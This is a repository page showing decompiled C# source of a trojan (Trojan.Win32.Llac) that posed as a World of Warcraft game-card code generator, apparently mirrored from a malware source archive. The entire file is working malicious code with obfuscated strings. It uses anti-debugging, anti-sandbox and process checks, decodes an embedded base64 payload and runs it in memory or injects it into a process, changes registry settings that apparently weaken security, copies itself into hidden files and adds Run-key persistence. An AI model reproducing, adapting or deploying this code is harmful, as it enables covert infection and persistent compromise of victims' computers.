ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2025-01-30 05:55:06 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
4121be2648
MalwareSourceCode/MSIL/Trojan/Win32/L/Trojan.Win32.Llac.lgnr-045e91a28a9a83e302813bf2c8cafb4d85c7cff6b8293383e46ed7ec7f2423bf/_0002.cs

458 lines
14 KiB
C#
Raw Normal View History

auto-decompiled msil via petikvx add
2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: WoW Gametimecard-Code Generator, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F6EFF043-3343-4D98-A648-6582746BA4AA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Llac.lgnr-045e91a28a9a83e302813bf2c8cafb4d85c7cff6b8293383e46ed7ec7f2423bf.exe
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Threading;
using System.Windows.Forms;
internal sealed class \u0002
{
private static \u0003 \u0002 = new \u0003();
private static string \u0003 = \u0008.\u0002(583184255);
private static string \u0005 = \u0008.\u0002(583184255);
private static byte[] \u0008 = new byte[7]
{
(byte) 98,
(byte) 87,
(byte) 76,
(byte) 65,
(byte) 54,
(byte) 43,
(byte) 32
};
private static byte[] \u0006;
private static bool \u000E = true;
private static bool \u000F = true;
private static bool \u0002\u2000 = true;
private static bool \u0003\u2000 = true;
private static bool \u0005\u2000 = true;
private static bool \u0008\u2000 = true;
private static bool \u0006\u2000 = true;
private static bool \u000E\u2000 = true;
private static bool \u000F\u2000 = true;
private static bool \u0002\u2001 = true;
private static bool \u0003\u2001 = true;
private static bool \u0005\u2001 = true;
private static bool \u0008\u2001 = true;
private static bool \u0006\u2001 = true;
private static bool \u000E\u2001 = true;
private static bool \u000F\u2001 = false;
private static string \u0002\u2002 = \u0008.\u0002(583184214);
private static string \u0003\u2002 = \u0008.\u0002(583184186);
private static bool \u0005\u2002 = true;
private static bool \u0008\u2002 = true;
private static bool \u0006\u2002 = true;
private static bool \u000E\u2002 = false;
private static bool \u000F\u2002 = false;
private static bool \u0002\u2003 = true;
private static string \u0003\u2003 = \u0008.\u0002(583184160);
private static bool \u0005\u2003 = false;
private static bool \u0008\u2003 = false;
private static int \u0006\u2003 = 0;
private static ThreadStart \u000E\u2003;
private static bool \u0002(string _param0) => Process.GetProcessesByName(_param0).Length > 0;
private static void \u0002(string _param0, string _param1)
{
int num = (int) MessageBox.Show(_param0, _param1, MessageBoxButtons.OK, MessageBoxIcon.Hand);
}
private static void \u0002() => Console.Write(\u0008.\u0002(583183482));
private static void \u0002(string[] _param0)
{
if (!(\u0002.\u0003 == \u0002.\u0005))
return;
\u0002.\u0002();
if (\u0002.\u000F\u2001)
{
try
{
if (\u0002.\u000E\u2003 == null)
\u0002.\u000E\u2003 = new ThreadStart(\u0002.\u0005);
new Thread(\u0002.\u000E\u2003).Start();
}
catch
{
}
}
\u0002.\u0002();
if (\u0002.\u000E)
{
try
{
if (Debugger.IsAttached)
return;
}
catch
{
}
}
if (\u0002.\u000F)
{
try
{
long ticks = DateTime.Now.Ticks;
Thread.Sleep(10);
if (DateTime.Now.Ticks - ticks < 10L)
return;
}
catch
{
}
}
if (\u0002.\u0002\u2000)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(583183469)))
return;
}
catch
{
}
}
if (\u0002.\u0003\u2000)
{
try
{
Form form = new Form();
form.Text = \u0008.\u0002(583183455);
form.Opacity = 0.0;
form.ShowInTaskbar = false;
form.Show();
if (form.Text == \u0008.\u0002(583183442))
return;
form.Close();
}
catch
{
}
}
if (\u0002.\u0005\u2000)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(583183425)))
return;
}
catch
{
}
}
if (\u0002.\u0008\u2000)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(583183411)))
return;
}
catch
{
}
}
if (\u0002.\u0006\u2000)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(583183397)))
return;
}
catch
{
}
}
if (\u0002.\u000E\u2000)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(583183382)))
return;
}
catch
{
}
}
if (\u0002.\u000F\u2000)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(583183373)))
return;
}
catch
{
}
}
if (\u0002.\u0002\u2001)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(583183614)))
return;
}
catch
{
}
}
\u0002.\u0002();
if (\u0002.\u0008\u2003)
{
try
{
Thread.Sleep(\u0002.\u0006\u2003 * 1000);
}
catch
{
}
}
\u0002.\u0002();
try
{
Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(\u0008.\u0002(583183600));
\u0002.\u0002();
StreamReader streamReader = new StreamReader(manifestResourceStream);
string end = streamReader.ReadToEnd();
\u0002.\u0002();
streamReader.Close();
\u0002.\u0006 = Convert.FromBase64String(end);
try
{
\u0002.\u0002();
Thread thread = new Thread(new ThreadStart(\u0002.\u0003));
\u0002.\u0002();
thread.Start();
\u0002.\u0002();
}
catch
{
}
}
catch
{
}
\u0002.\u0002();
if (\u0002.\u0005\u2002)
{
try
{
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(583183591), true).SetValue(\u0008.\u0002(583183525), (object) \u0008.\u0002(583183501), RegistryValueKind.DWord);
}
catch
{
}
try
{
if (Registry.CurrentUser.OpenSubKey(\u0008.\u0002(583183493)) == null)
{
Registry.CurrentUser.CreateSubKey(\u0008.\u0002(583183493));
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(583183493), true).SetValue(\u0008.\u0002(583183685), (object) \u0008.\u0002(583183501), RegistryValueKind.DWord);
}
else
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(583183493), true).SetValue(\u0008.\u0002(583183685), (object) \u0008.\u0002(583183501), RegistryValueKind.DWord);
Registry.LocalMachine.OpenSubKey(\u0008.\u0002(583183493), true).SetValue(\u0008.\u0002(583183685), (object) \u0008.\u0002(583183501), RegistryValueKind.DWord);
}
catch
{
}
if (\u0002.\u0008\u2002)
{
if (Registry.CurrentUser.OpenSubKey(\u0008.\u0002(583183669)) == null)
{
Registry.CurrentUser.CreateSubKey(\u0008.\u0002(583183669));
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(583183669), true).SetValue(\u0008.\u0002(583183618), (object) \u0008.\u0002(583183859), RegistryValueKind.DWord);
}
else
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(583183669), true).SetValue(\u0008.\u0002(583183618), (object) \u0008.\u0002(583183859), RegistryValueKind.DWord);
}
if (\u0002.\u0006\u2002)
{
try
{
new Process()
{
StartInfo = {
FileName = \u0008.\u0002(583183851),
Arguments = \u0008.\u0002(583183839),
UseShellExecute = false,
CreateNoWindow = true
}
}.Start();
}
catch
{
}
}
if (\u0002.\u000E\u2002)
{
try
{
if (Registry.CurrentUser.OpenSubKey(\u0008.\u0002(583183493)) == null)
{
Registry.CurrentUser.CreateSubKey(\u0008.\u0002(583183493));
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(583183493), true).SetValue(\u0008.\u0002(583183790), (object) \u0008.\u0002(583183765), RegistryValueKind.DWord);
}
else
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(583183493), true).SetValue(\u0008.\u0002(583183790), (object) \u0008.\u0002(583183765), RegistryValueKind.DWord);
}
catch
{
}
}
if (\u0002.\u000F\u2002)
{
try
{
if (Registry.CurrentUser.OpenSubKey(\u0008.\u0002(583183493)) == null)
{
Registry.CurrentUser.CreateSubKey(\u0008.\u0002(583183493));
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(583183493), true).SetValue(\u0008.\u0002(583183757), (object) \u0008.\u0002(583183765), RegistryValueKind.DWord);
}
else
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(583183493), true).SetValue(\u0008.\u0002(583183757), (object) \u0008.\u0002(583183765), RegistryValueKind.DWord);
}
catch
{
}
}
}
\u0002.\u0002();
if (\u0002.\u0002\u2003)
{
try
{
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(583183591), true).SetValue(\u0008.\u0002(583183990), (object) \u0008.\u0002(583183859), RegistryValueKind.DWord);
}
catch
{
}
try
{
FileStream fileStream1 = new FileStream(Process.GetCurrentProcess().MainModule.FileName, FileMode.Open, FileAccess.Read);
byte[] buffer = new byte[fileStream1.Length];
fileStream1.Read(buffer, 0, buffer.Length);
fileStream1.Close();
FileStream fileStream2 = new FileStream(Environment.GetEnvironmentVariable(\u0008.\u0002(583183979)) + \u0008.\u0002(583183966) + \u0002.\u0003\u2003, FileMode.Create);
fileStream2.Write(buffer, 0, buffer.Length);
fileStream2.Close();
fileStream2.Dispose();
FileStream fileStream3 = new FileStream(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0008.\u0002(583183966) + \u0002.\u0003\u2003, FileMode.Create);
fileStream3.Write(buffer, 0, buffer.Length);
fileStream3.Close();
fileStream3.Dispose();
File.SetAttributes(Environment.GetEnvironmentVariable(\u0008.\u0002(583183979)) + \u0008.\u0002(583183966) + \u0002.\u0003\u2003, FileAttributes.Hidden);
File.SetAttributes(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0008.\u0002(583183966) + \u0002.\u0003\u2003, FileAttributes.Hidden);
}
catch
{
}
try
{
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(583183958), true).SetValue(\u0008.\u0002(583183906), (object) (Environment.GetEnvironmentVariable(\u0008.\u0002(583183979)) + \u0008.\u0002(583183966) + \u0002.\u0003\u2003));
Registry.LocalMachine.OpenSubKey(\u0008.\u0002(583183958), true).SetValue(\u0008.\u0002(583183906), (object) (Environment.GetEnvironmentVariable(\u0008.\u0002(583183979)) + \u0008.\u0002(583183966) + \u0002.\u0003\u2003));
}
catch
{
}
if (\u0002.\u0005\u2002)
{
try
{
if (Registry.CurrentUser.OpenSubKey(\u0008.\u0002(583183884)) == null)
{
Registry.CurrentUser.CreateSubKey(\u0008.\u0002(583183884));
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(583183884), true).SetValue(\u0008.\u0002(583183906), (object) (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0008.\u0002(583183966) + \u0002.\u0003\u2003));
}
else
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(583183884), true).SetValue(\u0008.\u0002(583183906), (object) (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0008.\u0002(583183966) + \u0002.\u0003\u2003));
}
catch
{
}
}
}
\u0002.\u0002();
if (!\u0002.\u0005\u2003)
return;
try
{
if (Application.ExecutablePath.Contains(Environment.GetEnvironmentVariable(\u0008.\u0002(583183979))))
return;
string str = \u0008.\u0002(583184070) + (object) '"' + Environment.GetCommandLineArgs()[0] + (object) '"' + \u0008.\u0002(583184053) + (object) '"' + Path.GetFileName(Application.ExecutablePath) + (object) '"' + \u0008.\u0002(583184034);
TextWriter textWriter = (TextWriter) new StreamWriter(Environment.GetEnvironmentVariable(\u0008.\u0002(583183979)) + \u0008.\u0002(583184017));
textWriter.WriteLine(str);
textWriter.Close();
new Process()
{
StartInfo = {
FileName = (Environment.GetEnvironmentVariable(\u0008.\u0002(583183979)) + \u0008.\u0002(583184017)),
UseShellExecute = false,
CreateNoWindow = true
}
}.Start();
}
catch
{
}
}
public static void \u0003()
{
try
{
\u0002.\u0002();
Assembly assembly = Assembly.Load(\u0002.\u0006);
MethodInfo entryPoint = assembly.EntryPoint;
\u0002.\u0002();
entryPoint.Invoke(RuntimeHelpers.GetObjectValue(assembly.CreateInstance(entryPoint.Name)), new object[1]
{
(object) new string[0]
});
}
catch
{
try
{
\u0002.\u0002();
Assembly assembly = Assembly.Load(\u0002.\u0006);
MethodInfo entryPoint = assembly.EntryPoint;
\u0002.\u0002();
entryPoint.Invoke(RuntimeHelpers.GetObjectValue(assembly.CreateInstance(entryPoint.Name)), new object[0]);
}
catch
{
try
{
\u0002.\u0002();
MethodInfo entryPoint = Assembly.Load(\u0002.\u0006).EntryPoint;
\u0002.\u0002();
entryPoint.Invoke((object) null, (object[]) null);
}
catch
{
try
{
\u0002.\u0002();
\u0002.\u0002.\u0002(\u0002.\u0006, string.Empty, Application.ExecutablePath);
\u0002.\u0002();
}
catch
{
}
}
}
}
}
private static void \u0005() => \u0002.\u0002(\u0002.\u0002\u2002, \u0002.\u0003\u2002);
}
Reference in New Issue Copy Permalink